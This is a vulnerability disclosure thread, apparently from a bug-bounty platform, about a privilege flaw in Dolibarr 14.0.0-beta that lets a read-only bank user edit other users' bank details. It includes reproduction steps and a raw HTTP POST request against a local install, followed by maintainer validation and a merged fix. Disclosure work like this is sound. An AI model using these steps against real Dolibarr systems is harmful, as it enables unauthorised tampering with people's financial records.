Improper Handling of Insufficient Privileges in dolibarr/dolibarr


Reported on

May 24th 2021


unprivileged user can attach bank to another user.


user who dont have any access in "users and groups" can update users bank details


dolibarr 14.0.0-beta


1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Banks and cash module .

--->Read financial accounts

Now dont give any permission for Users & Groups module .

So, user B cant see or update any users details .Also cant update users bank details

2. Now from admin account goto HR and Bank of any other user by visiting url like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1.
And here add a bank details .

3. Finally goto user B account and sent bellow request to update bank details .

POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1


So, user B dont have any "users and groups" permission and also has read-only permission in bank can update other user bank details .

a year ago


According to code of v14.0.2, the controller for action=update to tupdate a bank is protected with if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) { So user B should have a write permission among 1 of the list $permissiontoaddbankaccount = (!empty($user->rights->salaries->write) || !empty($user->rights->hrm->employee->write) || !empty($user->rights->user->creer));

Can you check

Laurent Destailleur validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on bb64a2 a year ago
Laurent Destailleur has been awarded the fix bounty
to join this conversation